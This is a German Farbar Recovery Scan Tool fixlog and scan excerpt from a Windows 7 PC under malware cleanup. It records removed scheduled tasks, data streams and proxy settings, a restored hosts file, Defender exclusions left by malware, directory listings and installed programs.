C:\Windows\msdownld.tmp => erfolgreich verschoben
"C:\ProgramData\Iostream.exe" => nicht gefunden
"C:\Program Files (x86)\Common Files\new.bat" => nicht gefunden
"C:\Users\Nico\AppData\Local\agent.dat" => nicht gefunden
"C:\Users\Nico\AppData\Local\Config.xml" => nicht gefunden
"C:\Users\Nico\AppData\Local\Hottam.exe" => nicht gefunden
"C:\Users\Nico\AppData\Local\Hottam.tst" => nicht gefunden
"C:\Users\Nico\AppData\Local\InstallationConfiguration.xml" => nicht gefunden
"C:\Users\Nico\AppData\Local\installer.dat" => nicht gefunden
"C:\Users\Nico\AppData\Local\Jaytip.bin" => nicht gefunden
"C:\Users\Nico\AppData\Local\Main.dat" => nicht gefunden
"C:\Users\Nico\AppData\Local\md.xml" => nicht gefunden
"C:\Users\Nico\AppData\Local\noah.dat" => nicht gefunden
"C:\Users\Nico\AppData\Local\pfialx.dll" => nicht gefunden
"C:\Users\Nico\AppData\Local\Resmon.ResmonCfg" => nicht gefunden
"C:\Users\Nico\AppData\Local\sham.db" => nicht gefunden
"C:\Users\Nico\AppData\Local\uninstall_temp.ico" => nicht gefunden
"C:\Users\Nico\AppData\Local\VoltFinlab.bin" => nicht gefunden
"HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\{BFD98515-CD74-48A4-98E2-13D209E3EE4F}" => erfolgreich entfernt
HKLM\Software\Classes\CLSID\{BFD98515-CD74-48A4-98E2-13D209E3EE4F} => nicht gefunden
"C:\Windows\system32\mcicda64.dll" => nicht gefunden
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Boot\{099A856C-08D3-43C8-AD18-3D651763C816}" => erfolgreich entfernt
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{099A856C-08D3-43C8-AD18-3D651763C816}" => erfolgreich entfernt
"C:\Windows\System32\Tasks\Social Software" => nicht gefunden
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Social Software" => erfolgreich entfernt
"C:\Program Files\Social Software" => nicht gefunden
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{1622AF7B-53DD-4FEE-8BE9-907C9F57AA98} => nicht gefunden
"C:\Windows\System32\Tasks\SystemUpdate64" => nicht gefunden
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\SystemUpdate64 => nicht gefunden
"C:\Program Files\SystemaRev" => nicht gefunden
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{1913E8F8-F8A7-47F0-A2D5-DF77C0226E3E} => nicht gefunden
"C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_FG" => nicht gefunden
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\GoogleUpdateSecurityTaskMachine_FG => nicht gefunden
"C:\Users\Nico\AppData\Local\Temp\36dd72f0d5c24801a35656466bd03b9d" => nicht gefunden
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{28FB99D2-B4C3-4FD4-8949-3C860CE2DE24} => nicht gefunden
"C:\Windows\System32\Tasks\csrss" => nicht gefunden
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\csrss => nicht gefunden
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Boot\{412B9FDA-8C4C-40F4-A23C-696805866F9C}" => erfolgreich entfernt
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{412B9FDA-8C4C-40F4-A23C-696805866F9C}" => erfolgreich entfernt
"C:\Windows\System32\Tasks\AncillaryFunctionauf" => nicht gefunden
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\AncillaryFunctionauf" => erfolgreich entfernt
"C:\Program Files (x86)\nodejs" => nicht gefunden
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{42767FB3-1423-4F1B-8F31-8B5936FA8F06} => nicht gefunden
"C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_VJ" => nicht gefunden
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\GoogleUpdateSecurityTaskMachine_VJ => nicht gefunden
"C:\Users\Nico\AppData\Roaming\a4d85c2ba162448f9d08d690843ffb22" => nicht gefunden
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{478261E4-F178-4CD8-8575-B8ACE5A0769E} => nicht gefunden
"C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_AM" => nicht gefunden
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\GoogleUpdateSecurityTaskMachine_AM => nicht gefunden
"C:\Users\Nico\AppData\Local\Temp\be1f0849f130446da031e35271bfb3f7" => nicht gefunden
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{6372E416-89E4-46ED-A9C3-6F1F6F797A15} => nicht gefunden
"C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_NM" => nicht gefunden
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\GoogleUpdateSecurityTaskMachine_NM => nicht gefunden
"C:\Users\Nico\AppData\Roaming\6c3a24720f8d4be29080877f498e5aa9" => nicht gefunden
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{66E7FCFF-AEE1-4593-AF28-7B81A60E82D7}" => erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{66E7FCFF-AEE1-4593-AF28-7B81A60E82D7} => nicht gefunden
"C:\Windows\System32\Tasks\ScheduledUpdate" => nicht gefunden
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\ScheduledUpdate => nicht gefunden
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{6E7DD5F8-0819-4296-8B92-EEA20358E2F3} => nicht gefunden
"C:\Windows\System32\Tasks\MainPMgr" => nicht gefunden
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\MainPMgr => nicht gefunden
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{AB4D74FB-B89A-4A74-982B-76AE532F4F7F} => nicht gefunden
"C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_OT" => nicht gefunden
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\GoogleUpdateSecurityTaskMachine_OT => nicht gefunden
"C:\Users\Nico\AppData\Local\Temp\f4e669f936dd4a41b8d1678962b0fc78" => nicht gefunden
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{BAD80BEE-7129-4A3C-B9FA-580ED44A6159}" => erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{BAD80BEE-7129-4A3C-B9FA-580ED44A6159} => nicht gefunden
"C:\Windows\System32\Tasks\ReimageUpdater" => nicht gefunden
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\ReimageUpdater => nicht gefunden
"C:\Program Files\Reimage" => nicht gefunden
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C6FD6CF5-A7E5-4DC3-A8A0-17D3A10CD175} => nicht gefunden
"C:\Windows\System32\Tasks\WindowsRecoveryCleaner" => nicht gefunden
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\WindowsRecoveryCleaner => nicht gefunden
"C:\ProgramData\Iostream.exe" => nicht gefunden
C:\Users\Nico\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk => Verknüpfung Eigenschaft erfolgreich entfernt
C:\ProgramData => ":NT" ADS erfolgreich entfernt
C:\ProgramData => ":NT2" ADS erfolgreich entfernt
"C:\Users\All Users" => ":NT" ADS nicht gefunden.
"C:\Users\All Users" => ":NT2" ADS nicht gefunden.
"C:\ProgramData\Anwendungsdaten" => ":NT" ADS nicht gefunden.
"C:\ProgramData\Anwendungsdaten" => ":NT2" ADS nicht gefunden.
"C:\ProgramData\Application Data" => ":NT" ADS nicht gefunden.
"C:\ProgramData\Application Data" => ":NT2" ADS nicht gefunden.
C:\ProgramData\MTA San Andreas All => ":NT" ADS erfolgreich entfernt
C:\ProgramData\MTA San Andreas All => ":NT2" ADS erfolgreich entfernt
C:\Users\Nico\Anwendungsdaten => ":NT" ADS erfolgreich entfernt
C:\Users\Nico\Anwendungsdaten => ":NT2" ADS erfolgreich entfernt
"C:\Users\Nico\AppData\Roaming" => ":NT" ADS nicht gefunden.
"C:\Users\Nico\AppData\Roaming" => ":NT2" ADS nicht gefunden.
C:\Users\Public\AppData => ":CSM" ADS erfolgreich entfernt
"C:\Windows\system32\Drivers\etc\hosts" => wurde entsperrt
C:\Windows\system32\Drivers\etc\hosts => erfolgreich verschoben
Hosts erfolgreich wiederhergestellt.
VirusTotal: C:\Windows\system32\ntkrnlmp.exe => https://www.virustotal.com/file/5e27f275cd06956184baf125169bf6ab99368a90d203a9b7ee9fe61119b7ea6f/analysis/1526925422/
VirusTotal: C:\Windows\system32\osloader.exe => https://www.virustotal.com/file/ee1810c3bec825b672a40bec7438486c5b344332e2a06b9cd79f7213aa7a578b/analysis/1527842028/
"VirusTotal: C:\ProgramData\Microsoft\Windows\Audio\winamgr.exe" => nicht gefunden
========= dir "%ProgramFiles%" =========
Volume in Laufwerk C: hat keine Bezeichnung.
Volumeseriennummer: CC81-12A3
Verzeichnis von C:\Program Files
31.05.2018 16:22 <DIR> .
31.05.2018 16:22 <DIR> ..
02.01.2018 17:33 <DIR> AMD
02.01.2018 17:15 <DIR> ASUS
31.05.2018 14:13 <DIR> Common Files
03.05.2018 05:14 <DIR> DVD Maker
01.03.2018 13:58 <DIR> Epic Games
02.01.2018 17:15 <DIR> Intel
09.05.2018 03:16 <DIR> Internet Explorer
02.01.2018 20:09 <DIR> Logitech Gaming Software
31.05.2018 16:22 <DIR> Malwarebytes
14.07.2009 09:46 <DIR> Microsoft Games
27.05.2018 11:46 <DIR> Mozilla Firefox
14.07.2009 07:32 <DIR> MSBuild
02.01.2018 17:07 <DIR> Realtek
14.07.2009 07:32 <DIR> Reference Assemblies
08.05.2018 20:21 <DIR> TeamSpeak 3 Client
03.05.2018 05:14 <DIR> Windows Defender
02.01.2018 18:11 <DIR> Windows Mail
03.05.2018 05:14 <DIR> Windows Media Player
02.01.2018 16:16 <DIR> Windows NT
02.01.2018 18:11 <DIR> Windows Photo Viewer
02.01.2018 18:11 <DIR> Windows Portable Devices
02.01.2018 18:11 <DIR> Windows Sidebar
27.05.2018 09:43 <DIR> WinRAR
0 Datei(en), 0 Bytes
25 Verzeichnis(se), 836.029.267.968 Bytes frei
========= Ende von CMD: =========
========= dir "%ProgramFiles(x86)%" =========
Volume in Laufwerk C: hat keine Bezeichnung.
Volumeseriennummer: CC81-12A3
Verzeichnis von C:\Program Files (x86)
27.05.2018 15:37 <DIR> .
27.05.2018 15:37 <DIR> ..
25.04.2018 20:02 <DIR> Adobe
02.01.2018 17:33 <DIR> AMD
02.01.2018 17:05 <DIR> ASUS
31.05.2018 14:13 <DIR> Common Files
01.06.2018 10:01 <DIR> Drakensang Online
01.03.2018 13:56 <DIR> Epic Games
02.01.2018 17:15 <DIR> Intel
27.05.2018 09:11 <DIR> Internet Explorer
07.04.2018 18:40 <DIR> KeePass Password Safe 2
02.01.2018 17:06 <DIR> Microsoft.NET
27.05.2018 11:46 <DIR> Mozilla Maintenance Service
14.07.2009 07:32 <DIR> MSBuild
27.05.2018 09:21 <DIR> MTA San Andreas 1.5
06.01.2018 04:24 <DIR> obs-studio
27.05.2018 11:16 <DIR> OkayFreedom
29.01.2018 16:59 <DIR> OpenOffice 4
02.01.2018 17:06 <DIR> Realtek
14.07.2009 07:32 <DIR> Reference Assemblies
25.05.2018 12:20 <DIR> Rockstar Games
31.05.2018 21:31 <DIR> Steam
03.05.2018 05:14 <DIR> Windows Defender
02.01.2018 18:11 <DIR> Windows Mail
03.05.2018 05:14 <DIR> Windows Media Player
14.07.2009 07:32 <DIR> Windows NT
02.01.2018 18:11 <DIR> Windows Photo Viewer
02.01.2018 18:11 <DIR> Windows Portable Devices
02.01.2018 18:11 <DIR> Windows Sidebar
17.05.2018 08:27 <DIR> YaTQA
0 Datei(en), 0 Bytes
30 Verzeichnis(se), 836.029.149.184 Bytes frei
========= Ende von CMD: =========
========= dir "%ProgramData%" =========
Volume in Laufwerk C: hat keine Bezeichnung.
Volumeseriennummer: CC81-12A3
Verzeichnis von C:\ProgramData
26.04.2018 08:13 <DIR> Adobe
24.05.2018 18:04 <DIR> Epic
27.05.2018 09:47 <DIR> Intel
31.05.2018 14:04 <DIR> Logishrd
31.05.2018 16:22 <DIR> Malwarebytes
25.05.2018 12:24 <DIR> MTA San Andreas All
02.01.2018 21:29 <DIR> Riot Games
0 Datei(en), 0 Bytes
7 Verzeichnis(se), 836.000.247.808 Bytes frei
========= Ende von CMD: =========
========= dir "%Appdata%" =========
Volume in Laufwerk C: hat keine Bezeichnung.
Volumeseriennummer: CC81-12A3
Verzeichnis von C:\Users\Nico\AppData\Roaming
31.05.2018 16:26 <DIR> .
31.05.2018 16:26 <DIR> ..
25.04.2018 20:02 <DIR> Adobe
06.01.2018 04:28 <DIR> AMD
10.01.2018 20:24 <DIR> ATI
11.03.2018 01:39 <DIR> Axolot Games
30.05.2018 09:53 <DIR> DarkSoulsII
13.01.2018 16:31 <DIR> DVDVideoSoft
02.01.2018 16:17 <DIR> Identities
10.04.2018 11:45 <DIR> KeePass
02.01.2018 20:06 <DIR> Logitech
06.01.2018 04:33 <DIR> Macromedia
02.01.2018 17:18 <DIR> Mozilla
02.05.2018 09:39 <DIR> obs-studio
29.01.2018 16:59 <DIR> OpenOffice
31.05.2018 13:37 <DIR> Spotify
01.06.2018 10:33 <DIR> TS3Client
27.05.2018 09:43 <DIR> WinRAR
17.05.2018 08:31 <DIR> YaTQA
0 Datei(en), 0 Bytes
19 Verzeichnis(se), 836.000.182.272 Bytes frei
========= Ende von CMD: =========
========= dir "%LocalAppdata%" =========
Volume in Laufwerk C: hat keine Bezeichnung.
Volumeseriennummer: CC81-12A3
Verzeichnis von C:\Users\Nico\AppData\Local
01.06.2018 10:33 <DIR> .
01.06.2018 10:33 <DIR> ..
27.05.2018 09:35 <DIR> Adobe
02.01.2018 20:11 <DIR> AMD
10.01.2018 20:24 <DIR> ATI
11.03.2018 10:31 <DIR> Axolot Games
02.01.2018 20:19 <DIR> BFH_Test_Launcher
02.01.2018 19:32 <DIR> CEF
02.01.2018 16:27 <DIR> cFos
24.05.2018 18:36 <DIR> ElevatedDiagnostics
01.03.2018 13:56 <DIR> EpicGamesLauncher
27.05.2018 10:40 <DIR> ESET
01.03.2018 14:58 <DIR> FortniteGame
03.05.2018 20:47 64.480 GDIPFONTCACHEV1.DAT
02.01.2018 20:11 <DIR> Logitech
27.05.2018 09:47 <DIR> Microsoft
02.01.2018 17:19 <DIR> Mozilla
02.01.2018 22:31 <DIR> NVIDIA Corporation
20.05.2018 15:01 <DIR> osu!
10.01.2018 10:22 <DIR> Programs
02.01.2018 17:24 <DIR> RadeonInstaller
07.01.2018 15:41 <DIR> RadeonSettings
10.02.2018 10:17 <DIR> Razer
10.02.2018 09:58 <DIR> Razer_Inc
31.05.2018 13:44 <DIR> Spotify
02.01.2018 19:32 <DIR> Steam
01.06.2018 10:33 <DIR> Temp
02.01.2018 22:30 <DIR> TslGame
01.03.2018 14:58 <DIR> UnrealEngine
01.03.2018 13:56 <DIR> UnrealEngineLauncher
02.01.2018 16:16 <DIR> VirtualStore
1 Datei(en), 64.480 Bytes
30 Verzeichnis(se), 836.000.112.640 Bytes frei
========= Ende von CMD: =========
========= dir "%CommonProgramFiles(x86)%" =========
Volume in Laufwerk C: hat keine Bezeichnung.
Volumeseriennummer: CC81-12A3
Verzeichnis von C:\Program Files (x86)\Common Files
31.05.2018 14:13 <DIR> .
31.05.2018 14:13 <DIR> ..
25.04.2018 20:02 <DIR> Adobe
25.05.2018 20:48 <DIR> BattlEye
13.01.2018 16:31 <DIR> DVDVideoSoft
02.01.2018 17:06 <DIR> InstallShield
30.05.2018 09:52 <DIR> microsoft shared
02.01.2018 17:15 <DIR> PostureAgent
14.07.2009 05:20 <DIR> Services
14.07.2009 05:20 <DIR> SpeechEngines
20.05.2018 08:45 <DIR> Steam
03.05.2018 05:15 <DIR> System
0 Datei(en), 0 Bytes
12 Verzeichnis(se), 835.999.920.128 Bytes frei
========= Ende von CMD: =========
========= dir "%CommonProgramW6432%" =========
Volume in Laufwerk C: hat keine Bezeichnung.
Volumeseriennummer: CC81-12A3
Verzeichnis von C:\Program Files\Common Files
31.05.2018 14:13 <DIR> .
31.05.2018 14:13 <DIR> ..
02.01.2018 17:32 <DIR> ATI Technologies
30.05.2018 09:52 <DIR> Microsoft Shared
14.07.2009 05:20 <DIR> Services
14.07.2009 05:20 <DIR> SpeechEngines
03.05.2018 05:15 <DIR> System
0 Datei(en), 0 Bytes
7 Verzeichnis(se), 835.999.928.320 Bytes frei
========= Ende von CMD: =========
========= dir "%UserProfile%" =========
Volume in Laufwerk C: hat keine Bezeichnung.
Volumeseriennummer: CC81-12A3
Verzeichnis von C:\Users\Nico
01.06.2018 10:33 <DIR> .
01.06.2018 10:33 <DIR> ..
06.01.2018 12:05 <DIR> Aufnahmen
17.02.2018 09:51 <DIR> BFH
03.05.2018 08:36 <DIR> Contacts
01.06.2018 10:01 <DIR> Desktop
27.05.2018 09:24 <DIR> Documents
01.06.2018 10:33 <DIR> Downloads
03.05.2018 08:36 <DIR> Favorites
02.01.2018 17:14 <DIR> Intel
03.05.2018 08:36 <DIR> Links
03.05.2018 08:36 <DIR> Music
12.05.2018 22:30 <DIR> Pictures
03.05.2018 08:36 <DIR> Saved Games
03.05.2018 08:36 <DIR> Searches
03.05.2018 08:36 <DIR> Videos
0 Datei(en), 0 Bytes
16 Verzeichnis(se), 835.999.842.304 Bytes frei
========= Ende von CMD: =========
========= dir "C:\" =========
Volume in Laufwerk C: hat keine Bezeichnung.
Volumeseriennummer: CC81-12A3
Verzeichnis von C:\
31.05.2018 16:17 <DIR> AdwCleaner
02.01.2018 17:36 <DIR> AMD
27.05.2018 15:09 <DIR> AppData
01.06.2018 10:33 <DIR> FRST
27.05.2018 14:58 0 History
02.01.2018 17:12 <DIR> Intel
31.05.2018 14:04 1.893.155 myexe.exe
14.07.2009 05:20 <DIR> PerfLogs
31.05.2018 16:22 <DIR> Program Files
27.05.2018 15:37 <DIR> Program Files (x86)
02.01.2018 21:28 <DIR> Riot Games
02.01.2018 16:16 <DIR> Users
01.06.2018 10:33 <DIR> Windows
2 Datei(en), 1.893.155 Bytes
11 Verzeichnis(se), 835.998.208.000 Bytes frei
========= Ende von CMD: =========
================== ExportKey: ===================
[HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions]
[HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Extensions]
[HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths]
"C:\Windows"="0"
"C:\Windows\rss"="0"
"C:\Users\Nico\AppData\Roaming\EpicNet Inc\CloudNet"="0"
"C:\Users\Nico\AppData\Local\Temp\csrss"="0"
"C:\Users\Nico\AppData\Roaming\PatientSunset"="0"
"C:\Windows\windefender.exe"="0"
"C:\Users\Nico\AppData\Local\Temp\wup"="0"
"C:\Windows\System32\drivers"="0"
[HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes]
"csrss.exe"="0"
"cloudnet.exe"="0"
"windefender.exe"="0"
=== Ende von ExportKey ===
========= RemoveProxy: =========
"HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer" => erfolgreich entfernt
"HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings" => erfolgreich entfernt
"HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings" => erfolgreich entfernt
"HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings" => erfolgreich entfernt
"HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings" => erfolgreich entfernt
========= Ende von RemoveProxy: =========
========= ipconfig /flushdns =========
Windows-IP-Konfiguration
Der DNS-Aufl”sungscache wurde geleert.
========= Ende von CMD: =========
========= netsh winsock reset catalog =========
Der Winsock-Katalog wurde zurckgesetzt.
Sie mssen den Computer neu starten, um den Vorgang abzuschlieáen.
========= Ende von CMD: =========
========= netsh advfirewall reset =========
OK.
========= Ende von CMD: =========
========= netsh advfirewall set allprofiles state ON =========
OK.
========= Ende von CMD: =========
========= Bitsadmin /Reset /Allusers =========
BITSADMIN version 3.0 [ 7.5.7601 ]
BITS administration utility.
(C) Copyright 2000-2006 Microsoft Corp.
BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows.
Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets.
0 out of 0 jobs canceled.
========= Ende von CMD: =========
=========== EmptyTemp: ==========
BITS transfer queue => 8388608 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 36661039 B
Java, Flash, Steam htmlcache => 165183668 B
Windows/system/drivers => 69174937 B
Edge => 0 B
Chrome => 0 B
Firefox => 393009119 B
Opera => 0 B
Temp, IE cache, history, cookies, recent:
Users => 0 B
Default => 66228 B
Public => 0 B
ProgramData => 0 B
systemprofile => 58583585 B
systemprofile32 => 22979380 B
LocalService => 66228 B
NetworkService => 185242 B
Nico => 310643623 B
RecycleBin => 321072 B
EmptyTemp: => 1015.9 MB temporäre Dateien entfernt.
================================
Das System musste neu gestartet werden.
==== Ende von Fixlog 10:35:56 ====
Code:
ATTFilter Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version: 16.05.2018 01
durchgeführt von Nico (01-06-2018 10:42:14)
Gestartet von C:\Users\Nico\Downloads
Windows 7 Ultimate Service Pack 1 (X64) (2018-01-02 14:16:48)
Start-Modus: Normal
==========================================================
==================== Konten: =============================
Administrator (S-1-5-21-1284053026-2775073283-1402561352-500 - Administrator - Disabled)
ASPNET (S-1-5-21-1284053026-2775073283-1402561352-1002 - Limited - Enabled)
Gast (S-1-5-21-1284053026-2775073283-1402561352-501 - Limited - Disabled)
Nico (S-1-5-21-1284053026-2775073283-1402561352-1000 - Administrator - Enabled) => C:\Users\Nico
==================== Sicherheits-Center ========================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)
AV: Malwarebytes (Enabled - Up to date) {23007AD3-69FE-687C-2629-D584AFFAF72B}
AS: Malwarebytes (Enabled - Up to date) {98619B37-4FC4-67F2-1C99-EEF6D47DBD96}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
==================== Installierte Programme ======================
(Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)
Adobe Acrobat Reader DC - Deutsch (HKLM-x32\...\{AC76BA86-7AD7-1031-7B44-AC0F074E4100}) (Version: 18.011.20040 - Adobe Systems Incorporated)
Adobe Flash Player 29 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 29.0.0.171 - Adobe Systems Incorporated)
AMD Software (HKLM\...\AMD Catalyst Install Manager) (Version: 17.12.2 - Advanced Micro Devices, Inc.)
Cisco EAP-FAST Module (HKLM-x32\...\{64BF0187-F3D2-498B-99EA-163AF9AE6EC9}) (Version: 2.2.14 - Cisco Systems, Inc.) Hidden
Cisco LEAP Module (HKLM-x32\...\{51C7AD07-C3F6-4635-8E8A-231306D810FE}) (Version: 1.0.19 - Cisco Systems, Inc.) Hidden
Cisco PEAP Module (HKLM-x32\...\{ED5776D5-59B4-46B7-AF81-5F2D94D7C640}) (Version: 1.1.6 - Cisco Systems, Inc.) Hidden
Drakensang Online (HKLM-x32\...\Drakensang Online) (Version: - )
Epic Games Launcher (HKLM-x32\...\{70843FAC-DA36-49CD-A9A1-6CB1665C9346}) (Version: 1.1.143.0 - Epic Games, Inc.)
Epic Games Launcher Prerequisites (x64) (HKLM\...\{66C5838F-B854-4A55-89E6-A6138747A4DF}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden
Intel(R) Management Engine Components (HKLM\...\{1CEAC85D-2590-4760-800F-8DE5E91F3700}) (Version: 10.0.0.1204 - Intel Corporation)
Intel(R) Network Connections 19.1.51.0 (HKLM\...\PROSetDX) (Version: 19.1.51.0 - Intel)
Intel(R) USB 3.0 eXtensible Host Controller Driver (HKLM-x32\...\{240C3DDD-C5E9-4029-9DF7-95650D040CF2}) (Version: 3.0.0.16 - Intel Corporation)
Intel® Chipsatz-Gerätesoftware (HKLM-x32\...\{60c073df-e736-4210-9c3a-5fc2b651cef3}) (Version: 10.1.1.7 - Intel(R) Corporation) Hidden
KeePass Password Safe 2.38 (HKLM-x32\...\KeePassPasswordSafe2_is1) (Version: 2.38 - Dominik Reichl)
Launcher Prerequisites (x64) (HKLM-x32\...\{c6c5a357-c7ca-4a5f-9789-3bb1af579253}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden
League of Legends (HKLM-x32\...\League of Legends 1.0) (Version: 1.0 - Riot Games, Inc)
Logitech Gaming Software 8.96 (HKLM\...\Logitech Gaming Software) (Version: 8.96.88 - Logitech Inc.)
Malwarebytes Version 3.5.1.2522 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.5.1.2522 - Malwarebytes)
Microsoft .NET Framework 1.1 (HKLM-x32\...\{CB2F7EDD-9D1F-43C1-90FC-4F52EAE172A1}) (Version: 1.1.4322 - Microsoft)
Microsoft .NET Framework 4.7.1 (Deutsch) (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1031) (Version: 4.7.02558 - Microsoft Corporation)
Microsoft .NET Framework 4.7.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.7.02558 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x64) - 14.10.25008 (HKLM-x32\...\{f1e7e313-06df-4c56-96a9-99fdfd149c51}) (Version: 14.10.25008.0 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x86) - 14.10.25008 (HKLM-x32\...\{c239cea1-d49e-4e16-8e87-8c055765f7ec}) (Version: 14.10.25008.0 - Microsoft Corporation)
Mozilla Firefox 60.0.1 (x64 de) (HKLM\...\Mozilla Firefox 60.0.1 (x64 de)) (Version: 60.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 60.0.1 - Mozilla)
MTA:SA v1.5.5 (HKLM-x32\...\MTA:SA 1.5) (Version: v1.5.5 - Multi Theft Auto)
OBS Studio (HKLM-x32\...\OBS Studio) (Version: 20.1.3 - OBS Project)
OpenOffice 4.1.5 (HKLM-x32\...\{F0C909D7-D643-4628-8C6A-94073139F0CE}) (Version: 4.15.9789 - Apache Software Foundation)
osu! (HKLM-x32\...\{5fae645a-e4b4-4541-a037-7e4aa9f3e40a}) (Version: latest - ppy Pty Ltd)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7233 - Realtek Semiconductor Corp.)
RevServicesX (HKLM\...\{DDA8E261-B96C-4D2B-887F-D8AF1D7EF361}) (Version: 4.0.4 - SystemaRev) Hidden
Spotify (HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\...\Spotify) (Version: 1.0.80.474.gef6b503e - Spotify AB)
